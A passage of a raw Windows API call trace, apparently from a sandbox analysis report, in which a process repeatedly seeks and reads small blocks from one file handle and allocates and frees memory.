liDistanceToMove=0xcbf8, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=52216) returned 1 [0112.952] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0xf33, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0xf33, lpOverlapped=0x0) returned 1 [0112.953] malloc (_Size=0x48) returned 0x12ef2cf0 [0112.953] malloc (_Size=0x41) returned 0x12ef2fc0 [0112.954] free (_Block=0x12ef43d0) [0112.954] free (_Block=0x12ef29d0) [0112.956] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xdb3b, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=56123) returned 1 [0112.956] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.956] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xdb99, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=56217) returned 1 [0112.956] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x2cf, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x2cf, lpOverlapped=0x0) returned 1 [0112.957] malloc (_Size=0x48) returned 0x12ef29d0 [0112.957] malloc (_Size=0x2d) returned 0x12ef43d0 [0112.958] free (_Block=0x12ef2fc0) [0112.959] free (_Block=0x12ef2cf0) [0112.960] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xde78, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=56952) returned 1 [0112.960] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.960] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xdec2, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=57026) returned 1 [0112.960] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x30e, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x30e, lpOverlapped=0x0) returned 1 [0112.961] malloc (_Size=0x48) returned 0x12ef2fc0 [0112.961] malloc (_Size=0x33) returned 0x12ef4410 [0112.962] free (_Block=0x12ef43d0) [0112.963] free (_Block=0x12ef29d0) [0112.965] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xe1e0, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=57824) returned 1 [0112.965] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.965] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xe230, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=57904) returned 1 [0112.965] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x32d, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x32d, lpOverlapped=0x0) returned 1 [0112.967] malloc (_Size=0x48) returned 0x12ef29d0 [0112.967] malloc (_Size=0x2a) returned 0x12ef43d0 [0112.968] free (_Block=0x12ef4410) [0112.968] free (_Block=0x12ef2fc0) [0112.970] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xe56d, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=58733) returned 1 [0112.970] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.970] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xe5b4, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=58804) returned 1 [0112.970] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x17bf, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x17bf, lpOverlapped=0x0) returned 1 [0112.971] malloc (_Size=0x48) returned 0x12ef2b10 [0112.971] malloc (_Size=0x31) returned 0x12ef4410 [0112.972] free (_Block=0x12ef43d0) [0112.972] free (_Block=0x12ef29d0) [0112.974] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xfd83, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=64899) returned 1 [0112.974] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.974] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xfdd1, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=64977) returned 1 [0112.974] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x706, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x706, lpOverlapped=0x0) returned 1 [0112.975] malloc (_Size=0x48) returned 0x12ef29d0 [0112.975] malloc (_Size=0x2c) returned 0x12ef43d0 [0112.976] free (_Block=0x12ef4410) [0112.976] free (_Block=0x12ef2b10) [0112.983] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x104e7, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=66791) returned 1 [0112.983] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.983] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x10530, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=66864) returned 1 [0112.983] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x30c, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x30c, lpOverlapped=0x0) returned 1 [0112.984] malloc (_Size=0x48) returned 0x12ef2b10 [0112.984] malloc (_Size=0x28) returned 0x12ef0720 [0112.985] free (_Block=0x12ef43d0) [0112.986] free (_Block=0x12ef29d0) [0112.987] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1084c, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=67660) returned 1 [0112.988] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.988] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x10891, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=67729) returned 1 [0112.988] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x52e, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x52e, lpOverlapped=0x0) returned 1 [0112.989] malloc (_Size=0x48) returned 0x12ef2fc0 [0112.989] malloc (_Size=0x25) returned 0x12ef0750 [0112.992] free (_Block=0x12ef0720) [0112.992] free (_Block=0x12ef2b10) [0112.995] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x10dcf, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=69071) returned 1 [0112.995] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.995] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x10e11, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=69137) returned 1 [0112.995] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x645, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x645, lpOverlapped=0x0) returned 1 [0112.996] malloc (_Size=0x48) returned 0x12ef29d0 [0112.996] malloc (_Size=0x43) returned 0x12ef2b10 [0112.997] free (_Block=0x12ef0750) [0112.997] free (_Block=0x12ef2fc0) [0112.998] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x11466, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=70758) returned 1 [0112.998] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.999] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x114c6, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=70854) returned 1 [0112.999] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x137, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x137, lpOverlapped=0x0) returned 1 [0113.000] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.000] malloc (_Size=0x32) returned 0x12ef43d0 [0113.000] free (_Block=0x12ef2b10) [0113.001] free (_Block=0x12ef29d0) [0113.002] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1160d, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=71181) returned 1 [0113.002] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.002] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1165c, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=71260) returned 1 [0113.002] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x1327, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x1327, lpOverlapped=0x0) returned 1 [0113.004] malloc (_Size=0x48) returned 0x12ef29d0 [0113.004] malloc (_Size=0x27) returned 0x12ef0720 [0113.004] free (_Block=0x12ef43d0) [0113.005] free (_Block=0x12ef2cf0) [0113.007] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x12993, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=76179) returned 1 [0113.007] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.007] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x129d7, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=76247) returned 1 [0113.007] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0xb5f, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0xb5f, lpOverlapped=0x0) returned 1 [0113.008] malloc (_Size=0x48) returned 0x12ef2b10 [0113.008] malloc (_Size=0x33) returned 0x12ef43d0 [0113.010] free (_Block=0x12ef0720) [0113.010] free (_Block=0x12ef29d0) [0113.012] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x13546, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=79174) returned 1 [0113.012] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.012] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x13596, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=79254) returned 1 [0113.012] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x2bd, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x2bd, lpOverlapped=0x0) returned 1 [0113.013] malloc (_Size=0x48) returned 0x12ef2fc0 [0113.014] malloc (_Size=0x3a) returned 0x12ef29d0 [0113.014] free (_Block=0x12ef43d0) [0113.014] free (_Block=0x12ef2b10) [0113.016] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x13863, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=79971) returned 1 [0113.016] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.016] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x138ba, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=80058) returned 1 [0113.017] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x79f, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x79f, lpOverlapped=0x0) returned 1 [0113.022] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.022] malloc (_Size=0x2d) returned 0x12ef43d0 [0113.023] free (_Block=0x12ef29d0) [0113.023] free (_Block=0x12ef2fc0) [0113.025] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x14069, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=82025) returned 1 [0113.025] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.026] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x140b3, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=82099) returned 1 [0113.026] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x54d, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x54d, lpOverlapped=0x0) returned 1 [0113.028] malloc (_Size=0x48) returned 0x12ef2d40 [0113.028] malloc (_Size=0x3d) returned 0x12ef29d0 [0113.029] free (_Block=0x12ef43d0) [0113.029] free (_Block=0x12ef2cf0) [0113.115] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x14610, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=83472) returned 1 [0113.115] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.115] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1466a, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=83562) returned 1 [0113.115] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x126, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x126, lpOverlapped=0x0) returned 1 [0113.116] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.116] malloc (_Size=0x48) returned 0x12ef2fc0 [0113.117] free (_Block=0x12ef29d0) [0113.117] free (_Block=0x12ef2d40) [0113.122] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x147a0, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=83872) returned 1 [0113.122] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.122] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x14805, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=83973) returned 1 [0113.122] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x116, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x116, lpOverlapped=0x0) returned 1 [0113.123] malloc (_Size=0x48) returned 0x12ef2d40 [0113.123] malloc (_Size=0x28) returned 0x12ef0720 [0113.124] free (_Block=0x12ef2fc0) [0113.125] free (_Block=0x12ef2cf0) [0113.127] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1492b, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=84267) returned 1 [0113.127] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.127] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x14970, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=84336) returned 1 [0113.127] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x998, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x998, lpOverlapped=0x0) returned 1 [0113.129] malloc (_Size=0x48) returned 0x12ef29d0 [0113.129] malloc (_Size=0x3b) returned 0x12ef2cf0 [0113.129] free (_Block=0x12ef0720) [0113.130] free (_Block=0x12ef2d40) [0113.131] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x15318, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=86808) returned 1 [0113.131] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.131] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x15370, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=86896) returned 1 [0113.131] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x143, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x143, lpOverlapped=0x0) returned 1 [0113.133] malloc (_Size=0x48) returned 0x12ef2d40 [0113.133] malloc (_Size=0x34) returned 0x12ef43d0 [0113.133] free (_Block=0x12ef2cf0) [0113.133] free (_Block=0x12ef29d0) [0113.146] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x154c3, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=87235) returned 1 [0113.146] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.146] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x15514, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=87316) returned 1 [0113.146] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x600, lpOverlapped=0x0) returned 1 [0113.148] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.148] malloc (_Size=0x3a) returned 0x12ef2fc0 [0113.149] free (_Block=0x12ef43d0) [0113.150] free (_Block=0x12ef2d40) [0113.151] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x15b24, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=88868) returned 1 [0113.152] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.152] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x15b7b, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=88955) returned 1 [0113.152] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x15b, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x15b, lpOverlapped=0x0) returned 1 [0113.154] malloc (_Size=0x48) returned 0x12ef2d40 [0113.154] malloc (_Size=0x3d) returned 0x12ed3fc0 [0113.155] free (_Block=0x12ef2fc0) [0113.155] free (_Block=0x12ef2cf0) [0113.158] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x15ce6, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=89318) returned 1 [0113.158] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.158] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x15d40, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=89408) returned 1 [0113.158] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x127, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x127, lpOverlapped=0x0) returned 1 [0113.159] malloc (_Size=0x48) returned 0x12ed3840 [0113.159] malloc (_Size=0x3d) returned 0x12ef2cf0 [0113.160] free (_Block=0x12ed3fc0) [0113.160] free (_Block=0x12ef2d40) [0113.162] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x15e77, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=89719) returned 1 [0113.162] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.162] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x15ed1, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=89809) returned 1 [0113.162] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x126, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x126, lpOverlapped=0x0) returned 1 [0113.163] malloc (_Size=0x48) returned 0x12ef2fc0 [0113.163] malloc (_Size=0x3b) returned 0x12ef2d40 [0113.164] free (_Block=0x12ef2cf0) [0113.164] free (_Block=0x12ed3840) [0113.166] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x16007, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=90119) returned 1 [0113.166] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.166] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1605f, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=90207) returned 1 [0113.166] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x581, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x581, lpOverlapped=0x0) returned 1 [0113.167] malloc (_Size=0x48) returned 0x12ef2cf0 [0113.167] malloc (_Size=0x33) returned 0x12ef43d0 [0113.168] free (_Block=0x12ef2d40) [0113.168] free (_Block=0x12ef2fc0) [0113.170] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x165f0, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=91632) returned 1 [0113.170] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0113.170] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x16640, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=91712) returned 1 [0113.170] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x338, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x338, lpOverlapped=0x0) returned 1 [0113.171] malloc (_Size=0x48) returned 0x12ef2d40 [0113.171] malloc (_Size=0x36) returned 0x12ef4410 [0113.172] free (_Block=0x12ef43d0) [0113.172] free (_Block=0x12ef2cf0) [0113.174] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x16988, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=92552) returned 1 [0113.174] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, 